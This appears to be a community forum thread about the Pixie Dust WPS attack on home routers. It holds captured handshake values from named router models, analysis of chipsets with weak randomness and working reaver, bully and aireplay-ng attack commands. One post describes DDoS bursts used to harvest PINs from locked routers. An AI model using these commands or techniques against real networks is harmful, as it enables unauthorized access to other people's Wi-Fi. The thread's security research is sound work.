Hi there!Originally Posted by dragood
You missed some points.
In his presentation diominique spoke about 2 flows:
1) ES-1=ES-2=0 and that is just for Ralink Chipset and was indeed the first stuff that was coded (because, indeed, it doesn't requires extra brute force of seed)
2) Then wiire found the way to code the second breach revealed by Dominique : some broadcom devices for which we know the "interval" used to define the seed (cracked inmediatly)
In the meantime soxrok2212 sent to dominique datas form realteck chipsets because we saw that the same PKE was used in his two routers and in my two routers with realtek... all four routers from different manufacturer with different firmwares (but all is coming form the SDK for rtl819x project that developer uses to build their firmware)
And dominique foiund out a third breach
3) for this Realtek chipsets the exact time in seconds is used as a seed in DH exchange key process - or it is the time of the last build.( brute force required from exact time (in seconds) to 1970 < don't ask me why for some router it was found that 1970 was used as seed )
wiire coded everything and we have all the stuff in the hand to "pixie-dust" and also to create a custom code to try a different interval.
cheers
Invulnerable
InvulnerableCode:[P] E-Nonce: aa:90:80:28:ea:8e:89:cc:03:4a:ad:df:8e:87:02:26 [P] PKE: d9:c5:a6:9e:3a:c2:34:e8:15:85:5e:b6:c4:56:76:54:cd:3f:52:0e:f4:c2:14:5a:7c:08:9d:57:f6:f6:16:dd:e3:bf:30:ed:8a:45:77:73:14:84:10:a6:43:04:9f:0c:ad:d3:6d:6b:6d:2e:fb:a1:10:a9:14:16:c8:88:68:73:2f:96:ec:83:12:19:f4:7d:ab:79:3a:f9:1d:c8:ad:03:e0:c9:08:33:78:98:fb:b0:5b:81:1f:0f:e3:1e:2e:7e:40:01:b4:e6:fd:73:2b:16:12:3d:f1:b8:8a:f6:d5:f1:19:1e:67:78:b0:4e:6f:b5:f0:d8:14:b2:90:70:b3:a9:4f:49:dc:c0:ef:9c:07:0d:c7:7d:9b:59:24:4b:02:67:67:50:42:66:8e:4c:4e:b0:7d:92:4f:42:9b:da:cb:d6:08:53:5b:fa:74:49:54:14:6d:58:6e:71:b3:8c:9e:55:c9:21:5a:7a:9d:23:07:eb:8e:c1:39:0a:d8:2f:c9:72 [P] WPS Manufacturer: ASUSTeK Computer Inc. [P] WPS Model Name: Wi-Fi Protected Setup Router [P] WPS Model Number: RT-AC56U [P] Access Point Serial Number: d8:50:e6:da:0f:08 [P] R-Nonce: 0a:e6:39:ba:f9:44:27:bb:cb:94:8a:47:4c:8e:7b:78 [P] PKR: d8:fd:8c:86:72:8b:a8:ce:4d:e9:3d:a4:f9:9f:4c:3d:7b:62:c1:77:b2:63:52:99:c9:8b:7b:03:fb:0f:84:62:49:af:35:72:db:da:7b:a1:d8:31:3e:bb:88:a8:64:a6:83:58:80:66:fe:12:00:79:c7:42:a6:44:82:be:72:77:3e:ec:db:53:54:77:3b:be:67:3c:53:f6:c6:d9:96:e3:0a:69:99:af:3e:28:c9:a0:fb:16:12:f5:c7:4d:94:b2:99:bf:53:3b:49:53:9b:23:1e:ca:0a:8b:b1:14:50:34:ef:cc:1c:6a:d5:cb:7b:52:b5:4e:5d:b6:97:f2:de:9e:2f:ba:2e:69:30:6f:02:a2:dd:7c:29:6e:b5:f5:0b:d6:8e:41:18:2e:38:85:82:38:d7:f4:3a:67:c3:27:a1:d6:e9:e4:17:be:c7:12:71:59:66:31:63:4d:cb:b8:0c:8a:80:04:40:56:80:69:df:90:ab:37:3a:8b:cc:43:5b:3e [P] AuthKey: 27:e7:e4:5f:b8:60:6a:50:e5:78:a6:13:44:c4:81:40:58:7c:70:29:b0:66:0f:26:ac:83:91:9d:bd:a2:f9:8a [P] E-Hash1: bb:dc:4e:7e:ae:28:9a:07:84:c3:df:fd:92:96:41:62:89:f0:47:cd:6e:3e:c0:a9:21:ad:f7:ed:0a:3c:09:92 [P] E-Hash2: 70:76:13:b9:e9:84:a2:49:dc:93:70:df:19:30:9b:b8:4e:c5:68:16:8f:5f:b5:1c:6a:87:b0:e0:a7:b6:c7:ad
Code:[P] E-Nonce: 5b:e0:19:5c:4c:76:2e:08:3f:1b:b5:f1:13:ae:29:36 [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: [P] WPS Model Name: Wireless N Router [P] WPS Model Number: DIR-501 [P] Access Point Serial Number: 20070413-0001 [P] R-Nonce: 03:e9:eb:c1:80:d9:63:10:d8:16:77:cf:fa:41:d4:5b [P] PKR: 3f:2b:3b:b8:ba:89:4f:85:02:31:77:2c:71:3c:75:05:74:ca:69:da:99:f7:b8:c3:72:9c:2b:c3:9b:00:d0:f2:d3:56:7a:da:ab:65:da:99:22:cb:00:77:33:80:d0:6e:59:17:3f:3f:38:b5:8c:66:48:c9:60:03:da:5d:28:ef:7e:60:5c:7d:bd:bb:dd:7b:f4:d2:44:f0:62:74:b0:d1:3e:c2:c8:f7:7b:e8:d7:76:f5:53:84:97:9b:1b:85:83:28:fc:4b:45:ca:93:a5:5a:cd:03:0d:f4:bb:bf:c0:93:15:92:5a:43:e6:0d:ef:2c:d2:5f:5b:da:b0:ab:62:dd:76:74:03:cd:e7:ae:c8:b4:e9:ff:61:53:90:e3:70:c0:58:c7:25:99:0d:02:5c:03:96:07:5f:35:e9:ba:4a:db:67:3e:07:76:50:6f:b0:d5:0e:e1:56:e8:86:32:fd:52:68:7c:6f:83:56:ec:e5:a0:8c:80:80:25:74:ae:a6:40 [P] AuthKey: b0:82:36:0d:19:6a:7a:00:0c:16:73:1d:fc:0b:16:62:7f:ea:f1:0f:af:31:38:90:b0:14:59:5a:08:93:a8:13 [P] E-Hash1: d4:b3:36:3f:0e:c9:57:4f:1f:c5:44:4a:93:e2:e3:33:1f:6e:1e:1f:76:4f:6f:f6:26:4e:21:2a:86:68:ab:0b [P] E-Hash2: 6c:ac:17:51:5f:89:5d:00:dc:43:93:45:fc:ab:61:ff:a7:e5:f4:f0:52:97:a3:3b:4a:8d:0d:86:65:ee:aa:4d
Hey community, someone has recently brought to my and Wiire's attention an Atheros device that produces a strange E-Nonce, it follows this pattern:
where x is a hex character obviously (0-9, a-f).Code:xx:xx:00:00:00:00:00:00:00:00:00:00:00:00:00:00
It has occurred many times over different exchanges. It has happened in AR9130/AR9102 devices.
If E-S1 and E-S2 follow the same pattern, it would be a relatively fast crack for those chips, faster than the full Realtek bruteforce. It is not yet know if this is the case, but if anyone would like to contribute some data it couldn't hurt!
On the other hand, another Realtek chip was discovered to not use the time since Epoch PRNG, but it still follows the static PKE AND the E-Nonce follows a pattern like this:
It is a SoC, the RTL8671. Being a SoC, it might use a different PRNG but it may be just as vulnerable, if not even more vulnerable. There are a few people including me that are actively looking into it. I hope we find something soon!Code:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00:xx:xx:00:00
Last edited by soxrok2212; 2015-06-03 at 16:53.
Hello
For me dir501 also not working.
[P] E-Nonce: 51:a5:44:af:03:06:4e:0f:3e:c0:0b:b9:09:1b:c3:2c
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer:
[P] WPS Model Name: Wireless N Router
[P] WPS Model Number: DIR-501
[P] Access Point Serial Number: 20070413-0001
[+] Received M1 message
[P] R-Nonce: 4f:2b:f6:b7:08:bc:59:51:d7:b0:11:cb:0f:dd:8c:db
[P] PKR: 86:de:bf:e6:4a:ff:74:40:45:0f:91:5d:ff:a6:34:69:9e :1c:97:93:2e:48:c5:14:94:66:bd:f9:8b:59:44:4d:cc:9 7:bb:8e:41:f2:9f:47:f2:e1:f0:ad:2b:01:f7:1b:cb:04: 60:bd:d5:42:87:4d:75:dd:58:6c:6a:74:b5:c8:65:1d:09 :32:20:0b:e2:39:e9:49:1c:29:8a:d1:9f:18:bc:4b:7e:4 d:bd:db:e4:b9:9d:65:59:dd:51:c3:9d:9b:3e:5f:26:a1: 76:85:bd:4e:fc:de:ac:78:0d:57:f5:72:22:f7:16:9f:b8 :a7:f4:2c:4b:37:c8:3f:5f:9c:58:45:61:de:7b:17:ae:0 a:c8:e1:c3:30:a0:3c:7a:0d:e2:d8:9f:fe:04:a7:c3:7a: 42:c4:22:6a:32:02:2d:e5:ea:12:47:7c:06:1f:f4:62:11 :94:e4:09:3f:a3:8a:76:44:88:ed:fb:a4:ff:8b:0f:2a:0 c:b6:06:e0:0b:ca:05:ff:07
[P] AuthKey: 41:64:d3:91:09:11:8b:d1:f7:ec:21:6f:29:69:48:ba:0e :1e:9b:3e:26:c5:60:41:27:a9:69:da:12:7f:59:6e
[+] Sending M2 message
[P] E-Hash1: f6:63:0a:dd:2a:0c:e6:e3:e0:0d:76:98:35:6a:c9:14:89 :a8:3d:67:3b:5d:d2:08:ac:62:24:15:f7:e8:3d:8d
[P] E-Hash2: 76:29:da:24:1a:d8:d4:1b:b9:b4:c9:5f:3b:1c:19:28:81 :96:7a:40:f9:ac:d0:95:43:96:96:85:3c:18:49:d0
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.1
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust][*] Time taken: 2 s
[Pixie-Dust]
[Pixie-Dust] [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.
tried also with pixiewps force. If you need some more testing please feel free to contact me.
Here's a D-Link 501 (Version B) which works with --force :
Code:[P] E-Nonce: 50:37:4c:db:7a:3c:16:90:4b:57:6a:43:61:c2:85:01 [P] R-Nonce: ae:9b:f2:26:29:23:38:17:0f:d3:7f:bd:92:fb:2d:3b [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] PKR: b5:4a:f2:45:95:44:27:92:f4:8b:65:05:6f:88:83:ff:d3:20:fe:d9:ed:d8:e1:f0:52:3d:a9:95:2a:97:33:53:f4:72:66:30:83:90:8c:3c:58:81:ce:9f:7d:31:1b:04:a2:d2:ca:a6:7b:06:ca:15:97:f4:a5:e9:f5:ef:2e:2b:b7:fc:33:1c:f7:44:01:80:20:a2:49:f4:54:5e:9d:11:49:e3:39:16:0e:45:e9:08:4d:7a:75:47:a0:a6:d1:4d:9e:ee:4a:d0:69:e4:23:ef:5d:9f:d1:4b:34:19:ed:b4:77:95:81:3d:8a:6c:64:a3:f8:5d:d4:b1:89:00:da:65:9b:11:2b:20:5d:36:49:79:a9:25:b2:b6:26:0e:51:45:eb:4c:4a:f3:f1:b3:ac:e9:67:0a:fe:9a:b6:c8:60:75:a6:1f:2a:9b:51:1f:e2:34:b0:78:64:f5:55:25:93:8b:37:d5:cf:74:fd:25:bd:43:cb:e4:e0:c7:a7:71:cf:8c [P] AuthKey: 8e:7d:72:ef:1d:c3:ee:c5:4a:68:56:10:d5:60:d0:0b:62:9c:d9:b1:2d:a0:a7:5c:da:81:38:fe:a4:b9:6b:4a [P] E-Hash1: 90:b1:29:cf:44:fd:09:3a:74:7e:e1:fb:17:51:52:85:1a:41:26:30:bb:23:44:5d:53:b5:46:c4:5c:fa:1c:19 [P] E-Hash2: 43:d8:2a:15:c0:85:82:dc:32:1b:bf:04:47:15:73:56:fa:4a:f1:1c:13:6b:db:7a:0d:2e:fd:aa:37:96:44:7b
I have a Netgear R3600v2, router. Broadcom chipset BCM4360. Doesnt seem to be working. I can send .cap if you want/need. Doing brute force now
Netgear R3600v2 Broadcom BCM4360, doesnt seem to be working
E-Nonce: 5b:44:ac:16:26:6f:78:42:7a:9b:b7:91:60:c5:62:87
[P] PKE: 01:fb:e7:b0:80:43:cc:24:6d:f6:9d:b8:9a:89:0e:d0:bb :0e:57:10:c9:d3:bc:c1:e8:a0:df:e6:61:3e:e9:4a:9f:7 0:cb:ac:0b:71:7a:0e:bd:10:2d:83:c2:a8:b4:c4:3c:53: 04:7e:a7:17:13:43:81:9a:6b:f6:b7:d6:0e:32:bb:bf:33 :ce:2e:ca:b6:1f:c3:48:39:77:69:63:80:99:11:78:0d:f 7:0c:39:3d:4c:87:fa:c7:22:9d:97:41:11:f7:c9:b5:20: 09:01:0b:4b:12:2c:88:cb:99:53:11:69:2f:48:3a:2d:f9 :8b:d6:20:7c:84:a5:b0:ad:71:12:4d:46:29:74:66:58:7 c:f7:fe:52:92:6c:e7:86:41:b5:20:e4:e6:b9:64:95:c6: 08:f5:c4:e1:5c:7e:bf:51:a3:e2:da:17:d9:d7:b5:38:be :a5:4f:30:e8:bb:10:51:f6:78:27:0d:51:1d:49:c3:38:2 a:3a:a8:2b:05:6c:72:80:49
[P] WPS Manufacturer: NETGEAR, Inc.
[P] WPS Model Name: R6300v2
[P] WPS Model Number: R6300v2
[P] Access Point Serial Number: 679
[+] Received M1 message
[P] R-Nonce: 2c:2a:4b:27:57:1d:b5:5f:6a:90:f0:9d:26:b7:10:28
[P] PKR: 43:4b:29:6c:ff:cb:c9:6f:5c:f6:6e:2c:35:25:8b:e8:a4 :1b:bc:b2:df:a8:10:8b:72:c6:b8:a2:0b:97:76:e4:47:6 6:6a:11:7a:b0:fd:75:3f:cd:17:8f:16:c6:7e:44:cd:aa: f8:fb:0f:91:80:e6:2c:31:91:a9:a5:84:4a:4a:de:31:c1 :65:1e:a6:57:28:41:91:3d:11:dc:81:2c:af:b9:2f:8b:e e:41:1c:3b:05:61:03:0b:07:b0:10:b6:90:25:09:fd:e9: 4e:ec:bb:f5:49:8f:5c:e1:7f:43:b8:e8:70:2c:cc:db:bd :6d:a4:12:3b:b6:1a:f5:dc:43:11:68:11:9e:eb:d2:67:b 5:ea:58:7f:f9:6a:63:f2:a6:f6:21:ed:06:9f:2e:42:41: e9:18:d6:a2:7d:b5:3e:1b:04:12:eb:de:c6:05:5b:40:a5 :02:b1:1a:54:6d:a6:b2:3f:71:5e:8a:b3:77:f4:b4:66:f 7:f5:75:3c:a2:31:8e:dd:b3
[P] AuthKey: 52:fd:cb:ad:ec:b8:a5:a5:5b:79:38:ca:c6:c5:8c:ef:5f :8b:be:6a:61:4c:b5:e0:19:a1:39:bf:84:fd:a4:18
[+] Sending M2 message
[P] E-Hash1: f3:27:0d:b1:97:6d:ba:83:18:25:44:d8:0f:34:64:09:da :ce:7c:19:b9:89:87:62:98:41:17:45:3d:e4:db:63
[P] E-Hash2: d7:5b:14:f3:a1:43:d2:0b:3c:59:07:ae:ee:c4:dc:2a:32 :a2:a4:fa:18:e5:b5:20:52:c5:85:dc:27:a6:84:6b
Most Broadcom chipsets are not vulnerable because they run linux which uses a cryptographically secure method of generating random keys with good sources of entropy... it's pretty much completely unpredictable as of right now. In the future, something could certainly be found but not right now. The only Broadcom devices that will work are devices the run eCos which are typically found in DSL/Wireless gateway modems or Cable modem/Gateways.
Okay so 3 new things have been brought to my attention, some of which I've already pointed out but I just want to clear things up.
1- Someone recently e-mailed me about an Atheros device, specifically a D-Link DIR-600 rev A1. This device has an AR9285. A few months ago, the static PKE in Realtek devices made me question their implementation. Many of you know that PKE:
Well, it turns out that this device also has a static PKE!Code:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
I wasn't able to find source code for this specific model and unfortunately I can't find a firmware link either. Here is a list with all devices that use the AR9285 chip[/url] so the community can look to see if their devices follow the same pattern.Code:91:72:d8:6a:3d:bc:4c:5b:89:c8:b9:86:ff:31:ee:96:b9:bc:ab:ac:cc:1d:42:77:1d:46:09:a3:91:e3:b9:b2:c2:80:a3:2e:b4:01:58:36:f9:90:02:be:ab:94:69:31:38:4e:84:d2:7a:06:7e:bb:f6:15:9b:08:a6:55:67:48:29:c1:b0:69:fb:79:51:a8:d0:d5:bf:8d:65:58:71:4e:be:0d:33:68:30:87:04:7e:71:99:d1:26:e7:fa:8a:55:2a:b6:be:c5:23:f6:87:c8:f8:bd:6c:77:0c:09:3f:40:83:64:90:35:47:0f:b8:1b:6d:31:d5:3e:2f:35:7a:27:16:57:d8:1e:0c:8b:41:f5:1c:3b:b0:31:f5:b0:d7:23:40:26:7b:ce:b5:fd:07:c6:58:64:06:1a:45:55:4b:c4:ca:3b:50:57:bd:a0:fc:7c:69:7f:06:79:52:4e:30:1a:6d:f8:16:6e:1b:9f:51:97:e8:40:2f:9b:97:d1:7e:7e
2- Another strange thing is happening with Atheros, specifically in the Linksys WRT160NL. This is one of Linksys's devices that is completely open source, meaning it runs Linux. This WRT160NL has a AR9130/AR9102 chipset. The strange thing here is that the Enrollee Nonce follows a strange pattern:
Usually, E-S1 and E-S2 are generated right after the Enrollee Nonce, so I'd bet there is some sort of issue here. Here is a download link for the open source firmware and a list of AR9130/AR9102 devices for comparison against other devices.Code:XX:XX:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
3- Finally, another user pointed out a different Realtek chipset, the RTL8671 (as well as other SoC DSL/Wireless modems. I assume that since this chip is SoC, it may use a different PRNG. The nonces follow another strange pattern that as of right now we haven't been able to determine. Here is the pattern:
There is a device that has been confirmed to follow this pattern, a DIGISOL DG-BG4100NU. The firmware can be downloaded and extracted with binwalk here, and the source code for the RTL8186 chip can be found here.Code:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX:00:00:XX:XX
--I already know that Wiire, Datahead and I are looking into these but they are both very busy and I don't know enough C to read code and understand it completely. T6_x is also looking into some interesting stuff as well. I'm coming back to the community looking for help! Maybe we can do this one without Bongard! That is my goal this time, and it probably doesn't help to make this public but thats alright! Leave a reply if you have any questions or comments and thanks in advance!
Last edited by soxrok2212; 2015-06-10 at 04:26.
Perhaps this will help. ftp://ftp2.dlink.com/PRODUCTS/DIR-60...WARE_1.0.1.ZIP Or you can try Craig's D-Link wps pin generator?
On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on
if such thing happens use bully to recover it[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11
example :
it worked for mebully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
Try to add -n to your reaver line
(by the way, that is not a pixie dust issue and it should be posted somewhere else )
What also works is running aireplay-ng to force an association with the AP while you run reaver.
example:
aireplay-ng -1 12 -a <BSSID OF AP> -h <MAC ADDR. OF WIFI CARD> mon0
I have a TP Link router which I cannot brake. Brute forcing also doesn't work. And I have to say that this is the only router that outputs e-s1 and e-s2.
I can see in my area about 100 devices and only this TP Link outputs e-s1 and e-s2. My other router is Arcadyan with RT2860 chipset and I can read Authkey, PKE, etc... but e-s1 and e-s2 are never displayed by reaver.
Is there a way to force displaying e-s1 and e-s2 ?
Pixiewps description says that Ralink chipset never generates e-s1 and e-s2 and they are always zero. How do I run pixiewps in this case?
here is a gist with reaver output of TP LINK WR841N
https://gist.github.com/anonymous/6184dc4f7f9fe19ef46d
oh could there be progress with Atheros stuff???
I think this may not be the correct space to ask for help with my issue; going to make a new thread sorry! please delete
Last edited by Gurgg; 2015-07-26 at 22:08. Reason: delete
Anyone familiar with IDA Pro or binwalk or examining firmwares in general?
I found some interesting articles and documents highlighting flaws in /dev/random in embedded systems, thought I'd share with you. If you are not experienced, you probably won't understand much of it (thats me) but from what I understand, embedded systems from before July 2012 (or maybe even after) may be potentially vulnerable as they don't have a sufficient amount of entropy after being plugged in. The problem with newer devices (not sure about older devices) is that upon reboot, they save the entropy pool through a reboot/power loss. This is why forcing/DOSing an AP so it reboots is not effective in clearing entropy pools. I'm not sure if the same feature exists in pre-2012 devices so it may be something worth looking into. Heck, its even something Dominique noted in his presentations.
I guess one of the maintainers of /dev/random in Linux commented on his worries about the subject here: https://news.ycombinator.com/item?id=6548893
And the whole conference is available here: https://factorable.net/weakkeys12.conference.pdf
Whats even more intriguing about this is older hardware is more susceptible to DOS/force rebooting. The research paper explains how there were a lot of duplicate security keys used in various embedded systems, including "enterprise-grade routers from Cisco; server management cards from Dell, Hewlett-Packard, and IBM; virtual-private-network (VPN) devices; building security systems; network attached storage devices; and several kinds of consumer routers and VoIP products" (quoted from conference.pdf). This is what made them question the implementation. If there are a lot of duplicate keys, then there must not have been sufficient entropy feeding the PRNGs.
t6_x has ventured into the realm of Atheros devices and found that in hostapd, the WPS protocol is stopped before sending the M3 message if there is not sufficient entropy.
As you can see, there are many barriers to break, but much possibility for older devices, or maybe even newer devices if they don't include the patch released following the research. I mean, some manufacturers had zero security so anything is possible!
To soxrok2212
As we have noted to you in e-mails reference field experiments opening a WPS locked system - this DOS/forced rebooting does not seem to result in a total router reboot and the removal of the WPS locking mechanism. Rather it seems to affect the internal systems allowing for the collection of a small number of pins after the router is subjected to a short (15-20 sec) but intense DDOS process. Hence the WPS system always shows a locked state but small numbers of WPS pins can be collected after a DDOS and rest period. Usually approx 5 to 10 pins can be harvested every 360 seconds as a general rule.
Furthermore this short DDOS process sometimes results in the WPS pin resetting to 12345670. We have embedded this pin retest function into the VMR-MDK process which can considerably shorten the attack time required.
In field trials we have been getting good results from our lab variant VMR-MDK011x8 that we sent you which employs pixiedustwps1.1 and the automatic adding of any WPS pin found into the 4 stage attack process as well. However this is not a magic bullet and only a subset of routers are vulnerable to this approach.
MTeams
hi
i have some question
for offline cracking you need keywrapkey and authkey??? how u can find them???
thanks for help!
Last edited by lllhamedlll; 2015-07-30 at 05:54.
thanks... and how we can derive authkey manually?? ... before starting attack:
we have KDK = HMAC-SHA-256DHKey (N1 || EnrolleeMAC || N2)... DHkey= SHA-256(g^AB mod p)... and
AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)
so we should know the value on the right side of equation ... so we have authkey.... right??
i want to study about attack in details...thanks...
Last edited by lllhamedlll; 2015-07-31 at 09:09.
All the answers to your questions can be found here: http://cfile28.uf.tistory.com/attach...50FCFFCB3EC74E
Look on page 37.
You can also watch Dominique's video: http://video.adm.ntnu.no/pres/549931214e18d and look at his slides: http://archive.hack.lu/2014/Hacklu20...ack_on_wps.pdf
They'll help you a lot Glad to see someone who, like me, wants to understand the attack rather than just do it
The WPS protocol uses the Diffie-Hellman key exchange which is a method of securely exchanging cryptographic keys over a public channel. The AP wants to talk to the Client but they don't want anyone else to be able to eavesdrop they conversation.
To accomplish this, they both generate a pair of keys (a public key and a private key):
- First the AP generates a (hopefully) random private key (A).
- Then it generates its public key, PKe = g^A mod p, where g and p are known and described by the WPS protocol, and sends it to the Client (with M1).
Now, it's the turn of the Client to generate its pair of keys:
- random private key (B)
- PKr = g^B mod p, and sends PKr to the AP (with M2).
At this point they both have each others public key and find the 'shared secret', a common key used to set up a secure channel.
To find the shared secret (g^(AB) mod p):
- the AP does: shared_secret = PKr^A mod p (which is equal to g^(AB) mod p)
- the Client does: shared_secret = PKe^B mod p (which is equal to g^(AB) mod p)
It may seems magic at first but it's simple math.
From this point on the WPS protocol imposes these steps:
- DHKey = SHA-256(shared_secret)
- KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce), DHKey is used as key for the hash function
- AuthKey || KeyWrapKey || EMSK = kdf(KDK, “Wi-Fi Easy and Secure Key Derivation”, 640)
where || denotes concatenation (kdf ouputs a sequence of bytes, the first 256 are for AuthKey...).
AuthKey stands for Authentication session Key and it is, in fact, a session key.
Now if you are thinking at something like, "I sniff packets with Wireshark and then I generate AuthKey with the data collected". No, you can't. The Diffie-Hellman key exchange does not allow eavesdropping. It all starts with the pair of keys (public and private). To get to AuthKey you need the private key of one of the two involved entities (AP or Client). So Pixiewps needs AuthKey to work, which is provided by Reaver/Bully.
After M2 (before M3) they both have a secure channel to talk in.
However, Reaver >= 1.3 has a feature called "Small Diffie-Hellman keys" (-S, --dh-small). Enabling this feature causes Reaver to choose a static, not random private key, specifically the number 1.
So if we use this feauture with Reaver then the shared_secret becomes: g^(AB) mod p = PKe^B mod p = PKe mod p = PKe (g = 2, B = 1, p > 2).
PKe is calculated as g^A mod p, meaning that, PKe mod p = PKe (< p).
EDIT: of course you can calculate AuthKey everytime you know the private number (it doesn't have to be 1). With 1 it's just simplier.
Last edited by wiire; 2015-08-01 at 09:46. Reason: Added more info, fixed typo
Screenshot_2015-7-8-11-20.jpg
do this scripts suppose to work on nethunter ? sorry for bad capture, couldnt do it somehow else but you see the point is i can't use either mdk3 from kali or by team musket after make install mdk3-v6
Last edited by zen4; 2015-08-08 at 22:03.
I don't know, my only pentesting platform is Kali on my laptop. You'd have to ask in the nethunter part of this forum.
thank you very much
Hi
I run Reaver -i wlan0mon -c xx -b mac -K 1
on 3 of my router I have a dlink , netgear and Belkin it work complete only find password on the older Belkin router and others its say PIN NOT FOUND
am I doing something wrong or is this normal and this type of attack no longer works on newer router. is there anything better to try with
Thanks
i can't find answer to my question anywhere... and can't message anyone in this forum... so I'm forced to ask here:
in PBC method.... enrollee doesn't know any secret value...just press button and finish!.... so how is it possible to send M3 message or M5 or m7 message ?....it seems in this method sending this values is not necessary !
From what I've seen, even a Push Button Event is still a normal Wps transaction. It still runs through the whole M1 through M8, it will just accept I think any pin you throw at it. I tested that a while ago. PBE, then with reaver I tried pin 00000000 and it went through successfully as a full Wps transaction and retrieved the psk.
Hi soxrok2212 !!!
Thanks for WPS Pixie Dust Database.xls file. In cloumn F (Vulnerable?) = No . Does it means the specified chip wont Vulnerable with ( -f option) also ? or just with -K option of reaver.?
I think you are a bit confused here, -f is ONLY for Realtek devices when E-S1 and E-S2 are not generated within the same second, or within a few seconds of the Nonce. All -f does is it runs all the possible seeds through the PRNG (seeds in this specific case are time in seconds since Epoch). -f is NOT a solution to any router, ONLY Realtek when E-S1 and E-S2 are not generated the same second, or within a few seconds of the Nonce. In the database, "No" means that the specified AP is NOT currently vulnerable to the Pixie Dust attack.
Thank you soxrok2212 !!
Just re-installed KL1.1.0a, and when trying to apt-get install, libssl-dev, libpcap-dev and libsqlite3-dev I get this..
Any ideas?root@kali:~# apt-get install libssl-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
root@kali:~# apt-get install libpcap-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libpcap-dev
root@kali:~# apt-get install libsqlite3-dev
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package libsqlite3-dev
root@kali:~#
Kali Linux USB Installation using LinuxLive USB Creator
